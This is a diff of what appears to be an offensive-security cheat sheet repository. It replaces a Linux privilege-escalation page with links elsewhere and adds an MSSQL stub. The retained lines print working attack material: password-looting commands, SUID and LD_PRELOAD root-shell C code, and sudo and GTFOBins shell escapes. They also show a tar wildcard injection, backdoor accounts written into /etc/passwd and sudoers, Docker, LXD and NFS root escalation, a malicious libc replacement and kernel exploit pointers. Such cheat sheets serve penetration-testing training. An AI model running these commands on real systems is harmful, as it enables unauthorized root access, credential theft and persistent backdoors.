 /tmp/
 /dev/shm/
 ```
 ## References
 * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
 * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
 * [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
 * [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
 * [Pouki from JDI](#no_source_code)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -1,646 +1,50 @@
 # Linux - Privilege Escalation
-## Tools
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/)
-
+
- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
+* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#tools)
-    ```powershell
+* [Checklist](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#checklists)
-    ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
+* [Looting for passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#looting-for-passwords)
-    ```
+    * [Files containing passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#files-containing-passwords)
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
+    * [Old passwords in /etc/security/opasswd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#old-passwords-in-etcsecurityopasswd)
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker)
+    * [Last edited files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#last-edited-files)
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
+    * [In memory passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#in-memory-passwords)
-
+    * [Find sensitive files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-sensitive-files)
-## Summary
+* [SSH Key](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key)
-
+    * [Sensitive files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sensitive-files)
-* [Checklist](#checklist)
+    * [SSH Key Predictable PRNG (Authorized_Keys) Process](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key-predictable-prng-authorized_keys-process)
-* [Looting for passwords](#looting-for-passwords)
+* [Scheduled tasks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#scheduled-tasks)
-    * [Files containing passwords](#files-containing-passwords)
+    * [Cron jobs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs)
-    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
+    * [Systemd timers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#systemd-timers)
-    * [Last edited files](#last-edited-files)
+* [SUID](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#suid)
-    * [In memory passwords](#in-memory-passwords)
+    * [Find SUID binaries](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-suid-binaries)
-    * [Find sensitive files](#find-sensitive-files)
+    * [Create a SUID binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#create-a-suid-binary)
-* [Scheduled tasks](#scheduled-tasks)
+* [Capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#capabilities)
-    * [Cron jobs](#cron-jobs)
+    * [List capabilities of binaries](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#list-capabilities-of-binaries)
-    * [Systemd timers](#systemd-timers)
+    * [Edit capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#edit-capabilities)
-* [SUID](#suid)
+    * [Interesting capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#interesting-capabilities)
-    * [Find SUID binaries](#find-suid-binaries)
+* [SUDO](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo)
-    * [Create a SUID binary](#create-a-suid-binary)
+    * [NOPASSWD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nopasswd)
-* [Capabilities](#capabilities)
+    * [LD_PRELOAD and NOPASSWD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ld_preload-and-nopasswd)
-    * [List capabilities of binaries](#list-capabilities-of-binaries)
+    * [Doas](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#doas)
-    * [Edit capabilities](#edit-capabilities)
+    * [sudo_inject](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo_inject)
-    * [Interesting capabilities](#interesting-capabilities)
+    * [CVE-2019-14287](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2019-14287)
-* [SUDO](#sudo)
+* [GTFOBins](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#gtfobins)
-    * [NOPASSWD](#nopasswd)
+* [Wildcard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#wildcard)
-    * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
+* [Writable files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-files)
-    * [Doas](#doas)
+    * [Writable /etc/passwd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcpasswd)
-    * [sudo_inject](#sudo-inject)
+    * [Writable /etc/sudoers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcsudoers)
-* [GTFOBins](#gtfobins)
+* [NFS Root Squashing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nfs-root-squashing)
-* [Wildcard](#wildcard)
+* [Shared Library](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#shared-library)
-* [Writable files](#writable-files)
+    * [ldconfig](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ldconfig)
-    * [Writable /etc/passwd](#writable-etcpasswd)
+    * [RPATH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#rpath)
-    * [Writable /etc/sudoers](#writable-etcsudoers)
+* [Groups](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#groups)
-* [NFS Root Squashing](#nfs-root-squashing)
+    * [Docker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#docker)
-* [Shared Library](#shared-library)
+    * [LXC/LXD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#lxclxd)
-    * [ldconfig](#ldconfig)
+* [Hijack TMUX session](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#hijack-tmux-session)
-    * [RPATH](#rpath)
+* [Kernel Exploits](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#kernel-exploits)
-* [Groups](#groups)
+    * [CVE-2022-0847 (DirtyPipe)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2022-0847-dirtypipe)	
-    * [Docker](#docker)
+    * [CVE-2016-5195 (DirtyCow)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2016-5195-dirtycow)
-    * [LXC/LXD](#lxclxd)
+    * [CVE-2010-3904 (RDS)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-3904-rds)
-* [Kernel Exploits](#kernel-exploits)
+    * [CVE-2010-4258 (Full Nelson)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-4258-full-nelson)
-    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2012-0056 (Mempodipper)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2012-0056-mempodipper)
    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
 ## Checklists
 * Kernel and distribution release details
 * System Information:
  * Hostname
  * Networking details:
  * Current IP
  * Default route details
  * DNS server information
 * User Information:
  * Current user details
  * Last logged on users
  * Shows users logged onto the host
  * List all users including uid/gid information
  * List root accounts
  * Extracts password policies and hash storage method information
  * Checks umask value
  * Checks if password hashes are stored in /etc/passwd
  * Extract full details for 'default' uid's such as 0, 1000, 1001 etc
  * Attempt to read restricted files i.e. /etc/shadow
  * List current users history files (i.e .bash_history, .nano_history etc.)
  * Basic SSH checks
 * Privileged access:
  * Which users have recently used sudo
  * Determine if /etc/sudoers is accessible
  * Determine if the current user has Sudo access without a password
  * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
  * Is root's home directory accessible
  * List permissions for /home/
 * Environmental:
  * Display current $PATH
  * Displays env information
 * Jobs/Tasks:
  * List all cron jobs
  * Locate all world-writable cron jobs
  * Locate cron jobs owned by other users of the system
  * List the active and inactive systemd timers
 * Services:
  * List network connections (TCP & UDP)
  * List running processes
  * Lookup and list process binaries and associated permissions
  * List inetd.conf/xined.conf contents and associated binary file permissions
  * List init.d binary permissions
 * Version Information (of the following):
  * Sudo
  * MYSQL
  * Postgres
  * Apache
    * Checks user config
    * Shows enabled modules
    * Checks for htpasswd files
    * View www directories
 * Default/Weak Credentials:
  * Checks for default/weak Postgres accounts
  * Checks for default/weak MYSQL accounts
 * Searches:
  * Locate all SUID/GUID files
  * Locate all world-writable SUID/GUID files
  * Locate all SUID/GUID files owned by root
  * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
  * Locate files with POSIX capabilities
  * List all world-writable files
  * Find/list all accessible *.plan files and display contents
  * Find/list all accessible *.rhosts files and display contents
  * Show NFS server details
  * Locate *.conf and *.log files containing keyword supplied at script runtime
  * List all *.conf files located in /etc
  * Locate mail
 * Platform/software specific tests:
  * Checks to determine if we're in a Docker container
  * Checks to see if the host has Docker installed
  * Checks to determine if we're in an LXC container
 ## Looting for passwords
 ### Files containing passwords
 ```powershell
 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 ```
 ### Old passwords in /etc/security/opasswd
 The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
 :warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes 
 ### Last edited files
 Files that were edited in the last 10 minutes
 ```powershell
 find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
 ```
 ### In memory passwords
 ```powershell
 strings /dev/mem -n10 | grep -i PASS
 ```
 ### Find sensitive files
 ```powershell
 $ locate password | more           
 /boot/grub/i386-pc/password.mod
 /etc/pam.d/common-password
 /etc/pam.d/gdm-password
 /etc/pam.d/gdm-password.original
 /lib/live/config/0031-root-password
 ...
 ```
 ## Scheduled tasks
 ### Cron jobs
 Check if you have access with write permission on these files.   
 Check inside the file, to find other paths with write permissions.   
 ```powershell
 /etc/init.d
 /etc/cron*
 /etc/crontab
 /etc/cron.allow
 /etc/cron.d 
 /etc/cron.deny
 /etc/cron.daily
 /etc/cron.hourly
 /etc/cron.monthly
 /etc/cron.weekly
 /etc/sudoers
 /etc/exports
 /etc/anacrontab
 /var/spool/cron
 /var/spool/cron/crontabs/root
 crontab -l
 ls -alh /var/spool/cron;
 ls -al /etc/ | grep cron
 ls -al /etc/cron*
 cat /etc/cron*
 cat /etc/at.allow
 cat /etc/at.deny
 cat /etc/cron.allow
 cat /etc/cron.deny*
 ```
 ## Systemd timers
 ```powershell
 systemctl list-timers --all
 NEXT                          LEFT     LAST                          PASSED             UNIT                         ACTIVATES
 Mon 2019-04-01 02:59:14 CEST  15h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily.timer              apt-daily.service
 Mon 2019-04-01 06:20:40 CEST  19h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily-upgrade.timer      apt-daily-upgrade.service
 Mon 2019-04-01 07:36:10 CEST  20h left Sat 2019-03-09 14:28:25 CET   3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
 3 timers listed.
 ```
 ## SUID
 SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`.
 ```powershell
 ╭─swissky@lab ~  
 ╰─$ ls /usr/bin/sudo -alh                  
 -rwsr-xr-x 1 root root 138K 23 nov.  16:04 /usr/bin/sudo
 ```
 ### Find SUID binaries
 ```bash
 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
 find / -uid 0 -perm -4000 -type f 2>/dev/null
 ```
 ### Create a SUID binary
 ```bash
 print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
 gcc -o /tmp/suid /tmp/suid.c  
 sudo chmod +x /tmp/suid # execute right
 sudo chmod +s /tmp/suid # setuid bit
 ```
 ## Capabilities
 ### List capabilities of binaries 
 ```bash
 ╭─swissky@lab ~  
 ╰─$ /usr/bin/getcap -r  /usr/bin
 /usr/bin/fping                = cap_net_raw+ep
 /usr/bin/dumpcap              = cap_dac_override,cap_net_admin,cap_net_raw+eip
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/rlogin               = cap_net_bind_service+ep
 /usr/bin/ping                 = cap_net_raw+ep
 /usr/bin/rsh                  = cap_net_bind_service+ep
 /usr/bin/rcp                  = cap_net_bind_service+ep
 ```
 ### Edit capabilities
 ```powershell
 /usr/bin/setcap -r /bin/ping            # remove
 /usr/bin/setcap cap_net_raw+p /bin/ping # add
 ```
 ### Interesting capabilities
 Having the capability =ep means the binary has all the capabilities.
 ```powershell
 $ getcap openssl /usr/bin/openssl 
 openssl=ep
 ```
 Alternatively the following capabilities can be used in order to upgrade your current privileges.
 ```powershell
 cap_dac_read_search # read anything
 cap_setuid+ep # setuid
 ```
 Example of privilege escalation with `cap_setuid+ep`
 ```powershell
 $ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
 $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 sh-5.0# id
 uid=0(root) gid=1000(swissky)
 ```
 ## SUDO
 ### NOPASSWD
 Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
 ```bash
 $ sudo -l
 User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim
 ```
 In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
 ```bash
 sudo vim -c '!sh'
 sudo -u root vim -c '!sh'
 ```
 ### LD_PRELOAD and NOPASSWD
 If `LD_PRELOAD` is explicitly defined in the sudoers file
 ```powershell
 Defaults        env_keep += LD_PRELOAD
 ```
 Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
 ```powershell
 #include <stdio.h>
 #include <sys/types.h>
 #include <stdlib.h>
 void _init() {
 	unsetenv("LD_PRELOAD");
 	setgid(0);
 	setuid(0);
 	system("/bin/sh");
 }
 ```
 Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
 ### Doas
 There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
 ```bash
 permit nopass demo as root cmd vim
 ```
 ### sudo_inject
 Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
 ```powershell
 $ sudo whatever
 [sudo] password for user:    
 # Press <ctrl>+c since you don't have the password. 
 # This creates an invalid sudo tokens.
 $ sh exploit.sh
 .... wait 1 seconds
 $ sudo -i # no password required :)
 # id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
 ## GTFOBins
 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
 The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
 > gdb -nx -ex '!sh' -ex quit    
 > sudo mysql -e '\! /bin/sh'    
 > strace -o /dev/null /bin/sh    
 > sudo awk 'BEGIN {system("/bin/sh")}'
 ## Wildcard
 By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
 ```powershell
 # create file for exploitation
 touch -- "--checkpoint=1"
 touch -- "--checkpoint-action=exec=sh shell.sh"
 echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
 # vulnerable script
 tar cf archive.tar *
 ```
 Tool: [wildpwn](https://github.com/localh0t/wildpwn)
 ## Writable files
 List world writable files on the system.
 ```powershell
 find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
 find / -perm -2 -type f 2>/dev/null
 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
 ### Writable /etc/passwd
 First generate a password with one of the following commands.
 ```powershell
 openssl passwd -1 -salt hacker hacker
 mkpasswd -m SHA-512 hacker
 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
 ```
 Then add the user `hacker` and add the generated password.
 ```powershell
 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
 ```
 E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 You can now use the `su` command with `hacker:hacker`
 Alternatively you can use the following lines to add a dummy user without a password.    
 WARNING: you might degrade the current security of the machine.
 ```powershell
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
 su - dummy
 ```
 NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. 
 ### Writable /etc/sudoers
 ```powershell
 echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
 # use SUDO without password
 echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
 ```
 ## NFS Root Squashing
 When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
 ```powershell
 # create dir
 mkdir /tmp/nfsdir  
 # mount directory 
 mount -t nfs 10.10.10.10:/shared /tmp/nfsdir 
 cd /tmp/nfsdir
 # copy wanted shell 
 cp /bin/bash . 	
 # set suid permission
 chmod +s bash 	
 ```
 ## Shared Library
 ### ldconfig
 Identify shared libraries with `ldd`
 ```powershell
 $ ldd /opt/binary
    linux-vdso.so.1 (0x00007ffe961cd000)
    vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
    /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)        
 ```
 Create a library in `/tmp` and activate the path.
 ```powershell
 gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
 echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
 /opt/binary
 ```
 ### RPATH
 ```powershell
 level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
 0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]
 level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =>  (0x0068c000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x005bb000)
 ```
 By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable.
 ```powershell
 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
 level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =>  (0x005b0000)
 libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x00737000)
 ```
 Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
 ```powershell
 #include<stdlib.h>
 #define SHELL "/bin/sh"
 int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
 {
 char *file = SHELL;
 char *argv[] = {SHELL,0};
 setresuid(geteuid(),geteuid(), geteuid());
 execve(file,argv,0);
 }
 ```
 ## Groups
 ### Docker
 Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
 ```bash
 $> docker run -it --rm -v $PWD:/mnt bash
 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
 ```
 Almost similar but you will also see all processes running on the host and be connected to the same NICs.
 ```powershell
 docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
 ```
 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
 ```powershell
 $ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
 latest: Pulling from chrisfosterelli/rootplease
 2de59b831a23: Pull complete 
 354c3661655e: Pull complete 
 91930878a2d7: Pull complete 
 a3ed95caeb02: Pull complete 
 489b110c54dc: Pull complete 
 Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
 Status: Downloaded newer image for chrisfosterelli/rootplease:latest
 You should now have a root shell on the host OS
 Press Ctrl-D to exit the docker instance / shell
 sh-5.0# id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 ### LXC/LXD
 The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
 ```powershell
 ╭─swissky@lab ~  
 ╰─$ id
 uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
 ```
 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
 ```powershell
 # build a simple alpine image
 git clone https://github.com/saghul/lxd-alpine-builder
 ./build-alpine -a i686
 # import the image
 lxc image import ./alpine.tar.gz --alias myimage
 # run the image
 lxc init myimage mycontainer -c security.privileged=true
 # mount the /root into the image
 lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
 # interact with the container
 lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 Alternatively https://github.com/initstring/lxd_root
 ## Kernel Exploits
 Precompiled exploits can be found inside these repositories, run them at your own risk !
 * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
 * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
 The following exploits are known to work well.
 ### CVE-2016-5195 (DirtyCow)
 Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
 ```powershell
 # make dirtycow stable
 echo 0 > /proc/sys/vm/dirty_writeback_centisecs
 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
 https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
 ```
 ### CVE-2010-3904 (RDS)
 Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
 ```powershell
 https://www.exploit-db.com/exploits/15285/
 ```
 ### CVE-2010-4258 (Full Nelson)
 Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
 ```powershell
 https://www.exploit-db.com/exploits/15704/
 ```
 ### CVE-2012-0056 (Mempodipper)
 Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
 ```powershell
 https://www.exploit-db.com/exploits/18411
 ```
 ## References
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
 - [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
 - [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
 - [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
 - [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
 - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
--- a/Resources/MSSQL
+++ b/Resources/MSSQL
@@ -0,0 +1,61 @@
 # MSSQL Server
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mssql-server-cheatsheet](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/)
 * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#tools)
 * [Identify Instances and Databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-instaces-and-databases)
 	* [Discover Local SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-local-sql-server-instances)
 	* [Discover Domain SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-domain-sql-server-instances)
    * [Discover Remote SQL Server Instances](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-remote-sql-instances)
 	* [Identify Encrypted databases](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-encrypted-databases) 
 	* [Version Query](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#version-query)
 * [Identify Sensitive Information](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identify-sensitive-information)
 	* [Get Tables from a Specific Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#get-tables-from-specific-databases)
 	* [Gather 5 Entries from Each Column](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-each-column)
 	* [Gather 5 Entries from a Specific Table](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-a-specific-table)
    * [Dump common information from server to files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#dump-common-information-from-server-to-files)
 * [Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#linked-database)
 	* [Find Trusted Link](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-trusted-link)
 	* [Execute Query Through The Link](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-query-through-the-link)
 	* [Crawl Links for Instances in the Domain](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-instances-in-the-domain) 
 	* [Crawl Links for a Specific Instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-a-specific-instance)
 	* [Query Version of Linked Database](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-version-of-linked-database)
